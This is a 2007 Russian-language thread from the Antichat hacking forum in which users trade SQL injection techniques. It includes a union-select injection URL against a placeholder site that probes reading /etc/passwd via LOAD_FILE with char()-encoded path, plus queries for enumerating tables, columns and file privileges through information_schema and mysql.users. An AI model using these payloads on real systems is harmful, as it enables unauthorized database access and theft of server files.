Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
3 вопросов не дают спать. |
20.02.2007, 23:37
|
|
Познающий
Регистрация: 04.06.2006
Сообщений: 33
Провел на форуме:
204953
Репутация:
117
|
|
3 вопросов не дают спать.
Всем привет! Вот возникло 3 вопроса на которые просто необходимы ответы.
Просьба на Google не посылать, а то я щя сижу на GPRS-е, что очень дорого… 
Я прочитал все факи но ответов там не нашёл…
1) Как узнать возможна ли функция Load_File() при SQL-inj.?
И катит ли такой вариант: К примеру поле 5 имеет вывод в заголовок новости
и выполняя вот такой запрос http://target.com/index.php?id=-1+union+select+1,2,3,4,if(load_file(char(47,101,11 6,99,47,112,97,115,115,119,100)) is null,1,2),6,7,8,9,10,11/* мы получаем заголовке новости будет 1, тогда функция не работает, иначе всё Ok.
2) Какой функцией можно добавить новость или таблицу, нужно ли для этого особые права и реально таким образам сделать инклуд????
3) Опасна ли XSS если авторизация проходит по https-протоколу????
Помогите кто чем может  Plizzzzze. |
|
|
20.02.2007, 23:44
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332
Репутация:
1276
|
|
1) select if(load_file("blalala") is null,1,2);
2) Создание таблици CREATE TABLE, добавить запись INSERT INTO, а как ты хочешь сделать инклудит через SQL, удачи
3) НЕТ!
|
|
|
|
21.02.2007, 22:45
|
|
Познающий
Регистрация: 04.06.2006
Сообщений: 33
Провел на форуме:
204953
Репутация:
117
|
|
Сообщение от DIAgen
1) select if(load_file("blalala") is null,1,2);
2) Создание таблици CREATE TABLE, добавить запись INSERT INTO, а как ты хочешь сделать инклудит через SQL, удачи
3) НЕТ!
Большое спасибо!
Но вот тогда каким образом можна узнать имена таблиц, не уже ли только перебором????
|
|
|
|
21.02.2007, 22:51
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Сообщение от OneMiay
Но вот тогда каким образом можна узнать имена таблиц, не уже ли только перебором????
Ну, по сути да, только перебором, либо ручками, либо брутфорсом в скуль-инжекшон тул, хотя имхо руки рулят
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
24.02.2007, 22:19
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Если sql >=5.0 тогда можно узнать с помощью
таблицы:select table_name from information_schema.tables
колонки: select column_name from information_schema.columns where table_name='table'
|
|
|
|
26.02.2007, 23:39
|
|
Познающий
Регистрация: 04.06.2006
Сообщений: 33
Провел на форуме:
204953
Репутация:
117
|
|
Сообщение от kair
Если sql >=5.0 тогда можно узнать с помощью
таблицы:select table_name from information_schema.tables
колонки: select column_name from information_schema.columns where table_name='table'
Отлично! Спасибо тебе!!!! Это мне очень помагло! 
|
|
|
|
27.02.2007, 00:02
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
2 OneMiay
1) а)смотришь под каким ты юзером
б) если права позволяют, то смотришь в mysql.users
SELECT concat(file_priv,char(58),name) FROM mysql.users WHERE name='твой_юзер'
выдет что-то типа
Y - есть права юзать Load_File()
N - нет прав
__________________
Последний раз редактировалось +toxa+; 27.02.2007 в 00:19..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
